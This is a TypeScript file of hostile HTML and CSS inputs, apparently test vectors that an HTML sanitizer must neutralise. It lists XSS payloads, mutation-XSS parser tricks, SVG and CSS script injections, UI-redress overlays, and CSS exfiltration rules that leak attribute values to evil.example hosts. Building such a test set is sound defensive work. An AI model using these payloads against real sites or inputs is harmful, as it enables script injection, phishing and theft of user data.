/** Hostile inputs. Every one must come out inert (see invariants.ts). */
export const VECTORS: string[] = [
  // --- plain script ---
  '<script>alert(1)</script>',
  '<SCRIPT SRC=https://evil.example/x.js></SCRIPT>',
  '<script/xss src="https://evil.example/x.js"></script>',
  '<<script>alert(1);//<</script>',
  '<script>alert(1)<!--',
  '<scr<script>ipt>alert(1)</scr</script>ipt>',
  '<script type="module">import("https://e.x")</script>',
  '<script>/*</script><img src=x onerror=alert(1)>*/</script>',
  // --- handlers ---
  '<img src=x onerror=alert(1)>',
  '<img src="images/000000000000.webp" onload="alert(1)">',
  '<body onload=alert(1)>',
  '<div onmouseover="alert(1)">x</div>',
  '<svg onload=alert(1)>',
  '<svg><g onload="alert(1)"/></svg>',
  '<p ONCLICK=alert(1)>x</p>',
  '<p on\u0000click=alert(1)>x</p>',
  '<img src=x:alert(alt) onerror=eval(src) alt=0>',
  '<details open ontoggle=alert(1)>',
  '<video><source onerror="alert(1)">',
  '<audio src=x onerror=alert(1)>',
  '<input autofocus onfocus=alert(1)>',
  '<select autofocus onfocus=alert(1)>',
  '<textarea autofocus onfocus=alert(1)>',
  '<keygen autofocus onfocus=alert(1)>',
  '<marquee onstart=alert(1)>x</marquee>',
  '<isindex type=image src=1 onerror=alert(1)>',
  '<body onpageshow=alert(1)>',
  '<div style="x" onanimationstart=alert(1)>',
  '<x onclick=alert(1)>click</x>',
  '<custom-el onclick=alert(1)>x</custom-el>',
  // --- javascript: URLs ---
  '<a href="javascript:alert(1)">x</a>',
  '<a href="JaVaScRiPt:alert(1)">x</a>',
  '<a href="jav&#x09;ascript:alert(1)">x</a>',
  '<a href="jav&#x0A;ascript:alert(1)">x</a>',
  '<a href=" &#14; javascript:alert(1)">x</a>',
  '<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)">x</a>',
  '<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">x</a>',
  '<img src="javascript:alert(1)">',
  '<img src="  javascript:alert(1)">',
  '<img srcset="javascript:alert(1) 1x">',
  '<img src="vbscript:msgbox(1)">',
  '<iframe src="javascript:alert(1)"></iframe>',
  '<form action="javascript:alert(1)"><button>x</button></form>',
  '<button formaction="javascript:alert(1)">x</button>',
  '<math href="javascript:alert(1)">x</math>',
  '<svg><a xlink:href="javascript:alert(1)"><text x=20 y=20>x</text></a></svg>',
  '<svg><a href="javascript:alert(1)"><rect width=10 height=10/></a></svg>',
  '<object data="javascript:alert(1)">',
  '<embed src="javascript:alert(1)">',
  // --- embedding and navigation ---
  '<iframe srcdoc="<script>alert(1)</script>"></iframe>',
  '<iframe src="https://evil.example"></iframe>',
  '<frameset><frame src="https://evil.example"></frameset>',
  '<object data="https://evil.example/x.swf"></object>',
  '<embed src="https://evil.example/x.swf">',
  '<applet code="x"></applet>',
  '<portal src="https://evil.example"></portal>',
  '<meta http-equiv="refresh" content="0;url=https://evil.example">',
  '<meta http-equiv="Content-Security-Policy" content="script-src *">',
  '<meta charset="x" http-equiv="refresh" content="0;url=https://e.x">',
  '<base href="https://evil.example/">',
  '<link rel="stylesheet" href="https://evil.example/x.css">',
  '<link rel="import" href="https://evil.example/x.html">',
  '<link rel="prefetch" href="https://evil.example/ping">',
  '<form><input name="password" type="password"></form>',
  '<form id="f"></form><button form="f" formaction="https://e.x">go</button>',
  '<a ping="https://evil.example/ping" href="https://ok.example">x</a>',
  '<area href="javascript:alert(1)">',
  '<map><area shape=rect coords=0,0,1,1 href="https://e.x"></map>',
  '<dialog open>fake prompt<input></dialog>',
  // --- mXSS / parser confusion ---
  '<noscript><p title="</noscript><img src=x onerror=alert(1)>">',
  '<noscript><style></noscript><img src=x onerror=alert(1)></style></noscript>',
  '<template><script>alert(1)</script></template>',
  '<template><img src=x onerror=alert(1)></template>',
  '<svg><style><img src=x onerror=alert(1)></style></svg>',
  '<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">',
  '<math><mtext><table><mglyph><style><img src=x onerror=alert(1)>',
  '<math><mi><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src=1>">',
  '<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>',
  '<svg><p><style><img src=x onerror=alert(1)></style></p></svg>',
  '<svg><foreignObject><img src=x onerror=alert(1)></foreignObject></svg>',
  '<svg><foreignObject><iframe src="javascript:alert(1)"></iframe></foreignObject></svg>',
  '<xmp><img src=x onerror=alert(1)></xmp>',
  '<plaintext><img src=x onerror=alert(1)>',
  '<listing>&lt;img src=x onerror=alert(1)&gt;</listing>',
  '<noembed><img src=x onerror=alert(1)></noembed>',
  '<noframes><img src=x onerror=alert(1)></noframes>',
  '<textarea><img src=x onerror=alert(1)></textarea>',
  '<title><img src=x onerror=alert(1)></title>',
  '<style><img src=x onerror=alert(1)></style>',
  '<p><!--</p><img src=x onerror=alert(1)>--></p>',
  '<!--><img src=x onerror=alert(1)>-->',
  '<!---><img src=x onerror=alert(1)>',
  '<![CDATA[<img src=x onerror=alert(1)>]]>',
  '<svg><![CDATA[><img src=x onerror=alert(1)>]]></svg>',
  '<?xml version="1.0"?><img src=x onerror=alert(1)>',
  '<div id="x"><p title="`"><img src=x onerror=alert(1)>`">',
  '<img title="``" src=x onerror=alert(1)>',
  '<a title="&lt;/span&gt;&lt;img src=x onerror=alert(1)&gt;">x</a>',
  '<span title="</span><script>alert(1)</script>">x</span>',
  '<div data-x="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">x</div>',
  '<selectedcontent><img src=x onerror=alert(1)></selectedcontent>',
  '<select><iframe srcdoc="<script>alert(1)</script>"></select>',
  '<table><tr><td><script>alert(1)</script></td></tr></table>',
  '<table><style>@import url(https://e.x/a.css)</style></table>',
  // --- SVG / SMIL ---
  '<svg><animate attributeName="href" values="javascript:alert(1)"/><a><text>x</text></a></svg>',
  '<svg><set attributeName="onmouseover" to="alert(1)"/></svg>',
  '<svg><animate onbegin=alert(1) attributeName=x dur=1s>',
  '<svg><use href="data:image/svg+xml,<svg id=x xmlns=http://www.w3.org/2000/svg><script>alert(1)</script></svg>#x"/></svg>',
  '<svg><use xlink:href="https://evil.example/sprite.svg#a"/></svg>',
  '<svg><image href="https://evil.example/p.png"/></svg>',
  '<svg><image xlink:href="https://evil.example/p.png"/></svg>',
  '<svg><feImage href="https://evil.example/p.png"/></svg>',
  '<svg><filter><feImage xlink:href="https://evil.example/x"/></filter></svg>',
  '<svg><script>alert(1)</script></svg>',
  '<svg><script xlink:href="https://evil.example/x.js"/></svg>',
  '<svg><handler>alert(1)</handler></svg>',
  '<svg><discard onbegin=alert(1)/></svg>',
  '<svg><rect fill="url(https://evil.example/p#x)"/></svg>',
  '<svg><rect style="fill:url(https://evil.example/p)"/></svg>',
  '<svg><rect fill="url(javascript:alert(1))"/></svg>',
  '<svg><textPath href="https://evil.example/x#p">x</textPath></svg>',
  '<svg><iframe src="https://evil.example"></iframe></svg>',
  '<svg><a><rect width=100 height=100/><animate attributeName=href to=javascript:alert(1) /></a></svg>',
  '<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a xlink:href="javascript:alert(1)"><circle r=10/></a></svg>',
  // --- CSS: script, bindings and escapes ---
  '<div style="background:url(javascript:alert(1))">x</div>',
  '<div style="background:url(\'java\\73 cript:alert(1)\')">x</div>',
  '<div style="background:url(\\6a avascript:alert(1))">x</div>',
  '<div style="width:expression(alert(1))">x</div>',
  '<div style="width:ex/**/pression(alert(1))">x</div>',
  '<div style="width:\\65 xpression(alert(1))">x</div>',
  '<div style="behavior:url(x.htc)">x</div>',
  '<div style="-moz-binding:url(https://e.x/x.xml#x)">x</div>',
  '<div style="-webkit-binding:url(x)">x</div>',
  '<div style="\\62 ehavior:url(x.htc)">x</div>',
  '<style>p{background:url("javascript:alert(1)")}</style>',
  '<style>p{background:u\\72 l(https://e.x/p)}</style>',
  '<style>@\\69mport "https://e.x/a.css";</style>',
  '<style>@import "https://evil.example/a.css";</style>',
  '<style>@import url(https://evil.example/a.css);</style>',
  '<style>@import url("//evil.example/a.css") screen;</style>',
  '<style>@IMPORT url(https://evil.example/a.css);</style>',
  '<style>p{}@import url(https://evil.example/late.css);</style>',
  '<style>@font-face{font-family:x;src:url(https://evil.example/f.woff2)}</style>',
  '<style>@font-face{font-family:x;src:url(data:font/woff2;base64,AAAA)}</style>',
  '<style>@namespace url(https://evil.example);</style>',
  '<style>@charset "UTF-7";</style>',
  '<style>@document url-prefix(https://e.x){p{color:red}}</style>',
  '<style>@layer x{p{background:url(https://e.x/p)}}</style>',
  '<style>@media print{p{background:url(https://e.x/p)}}</style>',
  '<style>@media (min-width:1px){p{color:red}}</style>',
  '<style>@supports (background:url(https://e.x/p)){p{color:red}}</style>',
  '<style>@page{background:url(https://e.x/p)}</style>',
  '<style>p{--x:url(https://evil.example/p.png);background:var(--x)}</style>',
  '<style>p{--x:"</style><script>alert(1)</script>"}</style>',
  '<style>p::after{content:"</style><script>alert(1)</script>"}</style>',
  '<style>p{background-image:image-set("https://evil.example/p.png" 1x)}</style>',
  '<style>p{background-image:-webkit-image-set(url(https://evil.example/p.png) 1x)}</style>',
  '<style>p{background:cross-fade(url(https://e.x/a.png),url(https://e.x/b.png),50%)}</style>',
  '<style>p{background:element(#x)}</style>',
  '<style>p{background:paint(worklet)}</style>',
  '<style>p{content:attr(data-x url)}</style>',
  '<style>p{mask-image:url(https://evil.example/m.png)}</style>',
  '<style>p{list-style:url(https://evil.example/l.png)}</style>',
  '<style>p{cursor:url(https://evil.example/c.cur),auto}</style>',
  '<style>p{border-image:url(https://evil.example/b.png) 30}</style>',
  '<style>p{background:url(//evil.example/p.png)}</style>',
  '<style>p{background:url(\\\\evil.example\\p.png)}</style>',
  '<style>p{background:url(http://evil.example/p.png)}</style>',
  '<style>p{background:url( "https://evil.example/p.png" )}</style>',
  '<style>p{background:URL(https://evil.example/p.png)}</style>',
  // --- CSS exfiltration ---
  '<style>input[value^=a]{background:url(https://evil.example/?a)}</style>',
  '<style>[data-secret^="1"]{background:url(https://evil.example/1)}</style>',
  '<style>@font-face{font-family:probe;src:url(https://evil.example/?A);unicode-range:U+41}p{font-family:probe}</style>',
  '<style>*{background:url(https://evil.example/track.gif)}</style>',
  // --- UI redress ---
  '<div style="position:fixed;inset:0;z-index:9999">Enter your password</div>',
  '<div style="position:FIXED;top:0">x</div>',
  '<div style="position:fi\\78 ed;top:0">x</div>',
  '<div style="position:sticky;top:0">x</div>',
  '<div style="position:-webkit-sticky;top:0">x</div>',
  '<style>.o{position:fixed!important;inset:0}</style><div class=o>x</div>',
  '<style>.o{position:fixed}</style>',
  // --- tracking and external media ---
  '<img src="https://tracker.example/p.gif" width=1 height=1>',
  '<img src="//tracker.example/p.gif">',
  '<img src="http://tracker.example/p.gif">',
  '<img srcset="https://t.example/a.png 1x, images/000000000000.webp 2x">',
  '<picture><source srcset="https://t.example/a.webp"><img src="https://t.example/a.png"></picture>',
  '<img src="https://user:pw@evil.example/p.png">',
  '<img src="https://127.0.0.1/p.png">',
  '<img src="https://[::1]/p.png">',
  '<img src="https://evil.example:8443/p.png">',
  '<img src="file:///etc/passwd">',
  '<img src="blob:https://evil.example/uuid">',
  '<img src="data:image/svg+xml,<svg onload=alert(1) xmlns=%22http://www.w3.org/2000/svg%22/>">',
  '<video src="https://evil.example/v.mp4" autoplay></video>',
  '<audio src="https://evil.example/a.mp3" autoplay></audio>',
  '<div style="background:url(data:text/html,<script>alert(1)</script>)">x</div>',
  // --- attribute smuggling ---
  '<p is="x-evil">x</p>',
  '<p nonce="abc" integrity="sha256-x" crossorigin="use-credentials">x</p>',
  '<p contenteditable autofocus tabindex=1 popover>x</p>',
  '<p slot="x" part="y" exportparts="z">x</p>',
  '<div shadowrootmode="open"><script>alert(1)</script></div>',
  '<template shadowrootmode="open"><img src=x onerror=alert(1)></template>',
  '<p data-face="back">x</p>',
  '<p id="__proto__">x</p>',
  '<p id="document">x</p>',
  '<form name="body"></form>',
  '<img name="getElementById" src="images/000000000000.webp">',
  '<p xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)">x</p>',
  '<p style="color:red" style="background:url(https://e.x/p)">x</p>',
  '<p class="a" onclick="x" class="b">x</p>',
  // --- meta tag abuse ---
  '<meta name="scrollodex:finish" content="holo;javascript:alert(1)">',
  '<meta name="scrollodex:finish-mask" content="https://evil.example/m.png">',
  '<meta name="scrollodex:background" content="url(https://evil.example/p)">',
  '<meta name="scrollodex:background" content="red;background:url(https://e.x)">',
  '<meta name="scrollodex:orientation" content="sideways">',
  '<meta name="viewport" content="width=device-width">',
  '<meta name="scrollodex:finish" content="gloss" http-equiv="refresh">',
  // --- review 2026-09-25: URL smuggling ---
  '<style>div{--a:"https://e.example/x.png";background-image:image-set(var(--a) 1x)}</style><div>x</div>',
  '<div style="--a:\\"https://e.example/x.png\\";background-image:image-set(var(--a) 1x)">x</div>',
  '<style>div{background-image:-webkit-image-set(env(x) 1x)}</style><div>x</div>',
  '<style>div{background-image:cross-fade(var(--a), url(images/000000000000.webp) 50%)}</style><div>x</div>',
  '<svg><rect fill="u\\72l(https://evil.example/x.svg#p)" width="10" height="10"></rect></svg>',
  '<svg><rect filter="u\\rl(https://e.example/f.svg#f)" width="10" height="10"></rect></svg>',
  '<svg><circle stroke="\\75 rl(https://e.example/s.svg#s)" r="4"></circle></svg>',
];
